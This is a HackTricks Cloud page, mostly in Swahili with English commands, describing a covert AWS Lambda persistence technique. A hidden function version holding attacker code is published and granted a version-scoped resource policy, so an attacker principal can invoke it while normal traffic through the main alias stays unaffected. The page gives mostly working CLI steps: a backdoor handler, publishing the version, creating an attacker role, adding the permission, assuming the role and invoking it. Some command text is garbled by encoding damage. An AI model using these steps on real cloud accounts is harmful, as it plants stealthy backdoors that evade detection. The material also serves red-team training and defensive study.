HackTricks CloudAWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na đŹ Discord group au the telegram group au utufuate kwenye Twitter đŚ @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.
Muhtasari
Unda toleo lililofichwa la Lambda lenye logic ya attacker na uweke resource-based policy kwa wigo wa toleo hilo maalum (au alias) ukitumia parameter --qualifier katika lambda add-permission. Toa tu lambda:InvokeFunction kwenye arn:aws:lambda:REGION:ACCT:function:FN:VERSION kwa attacker principal. Ita za kawaida kupitia jina la function au alias kuu hazitathiriwa, wakati attacker anaweza kuitisha moja kwa moja version ARN iliyobackdoor.
Hii ni ya kuficha zaidi kuliko kufichua Function URL na haiathiri alias kuu ya trafiki.
Ruhusa Zinazohitajika (attacker)
lambda:UpdateFunctionCode,lambda:UpdateFunctionConfiguration,lambda:PublishVersion,lambda:GetFunctionConfigurationlambda:AddPermission(to add version-scoped resource policy)iam:CreateRole,iam:PutRolePolicy,iam:GetRole,sts:AssumeRole(to simulate an attacker principal)
Attack Steps (CLI)
Chapisha toleo lililofichwa, ongeza ruhusa yenye wigo wa qualifier, ita kama attacker
```bash # Vars REGION=us-east-1 TARGET_FN=[Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., âmainâ) stays on a clean version
aws lambda create-alias âfunction-name â$TARGET_FNâ âname main âfunction-version âregion â$REGIONâ
1) Build a small backdoor handler and publish as a new version
cat > bdoor.py <<PY import json, os, boto3
def lambda_handler(e, c): ident = boto3.client(sts).get_caller_identity() return {âhtâ: True, âwhoâ: ident, âenvâ: {âfnâ: os.getenv(AWS_LAMBDA_FUNCTION_NAME)}} PY zip bdoor.zip bdoor.py aws lambda update-function-code âfunction-name â$TARGET_FNâ âzip-file fileb://bdoor.zip âregion $REGION aws lambda update-function-configuration âfunction-name â$TARGET_FNâ âhandler bdoor.lambda_handler âregion $REGION until [ â$(aws lambda get-function-configuration âfunction-name â$TARGET_FNâ âregion $REGION âquery LastUpdateStatus âoutput text)â = âSuccessfulâ ]; do sleep 2; done VER=$(aws lambda publish-version âfunction-name â$TARGET_FNâ âregion $REGION âquery Version âoutput text) VER_ARN=$(aws lambda get-function âfunction-name â$TARGET_FN:$VERâ âregion $REGION âquery Configuration.FunctionArn âoutput text) echo âPublished version: $VER ($VER_ARN)â
2) Create an attacker principal and allow only version invocation (same-account simulation)
ATTACK_ROLE_NAME=ht-version-invoker aws iam create-role ârole-name $ATTACK_ROLE_NAME âassume-role-policy-document Version:2012-10-17 >/dev/null cat > /tmp/invoke-policy.json <<POL { âVersionâ: â2012-10-17â, âStatementâ: [{ âEffectâ: âAllowâ, âActionâ: [âlambda:InvokeFunctionâ], âResourceâ: [â$VER_ARNâ] }] } POL aws iam put-role-policy ârole-name $ATTACK_ROLE_NAME âpolicy-name ht-invoke-version âpolicy-document file:///tmp/invoke-policy.json
Add resource-based policy scoped to the version (Qualifier)
aws lambda add-permission
âfunction-name â$TARGET_FNâ
âqualifier â$VERâ
âstatement-id ht-version-backdoor
âaction lambda:InvokeFunction
âprincipal arn:aws:iam::$(aws sts get-caller-identity âquery Account âoutput text):role/$ATTACK_ROLE_NAME
âregion $REGION
3) Assume the attacker role and invoke only the qualified version
ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity âquery Account âoutput text):role/$ATTACK_ROLE_NAME CREDS=$(aws sts assume-role ârole-arn â$ATTACK_ROLE_ARNâ ârole-session-name htInvoke âquery Credentials âoutput json) export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId) export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey) export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken) aws lambda invoke âfunction-name â$VER_ARNâ /tmp/ver-out.json âregion $REGION >/dev/null cat /tmp/ver-out.json
4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
aws lambda remove-permission âfunction-name â$TARGET_FNâ âstatement-id ht-version-backdoor âqualifier â$VERâ âregion $REGION || true
</details>
## Athari
- Hutoa backdoor ya siri ili kuwaita toleo lililofichwa la function bila kubadilisha alias kuu au kufichua Function URL.
- Inapunguza mfichuko kwa tu toleo/alias iliyobainishwa kupitia resource-based policy `Qualifier`, ikipunguza eneo la kugundua huku ikidumisha uwezo thabiti wa kuitwa kwa attacker principal.
> [!TIP]
> Jifunze na ufanye mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Saidia HackTricks</summary>
>
> - Angalia the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) au the [**telegram group**](https://t.me/peass) au **utufuate** kwenye **Twitter** đŚ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki hacking tricks kwa kutuma PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>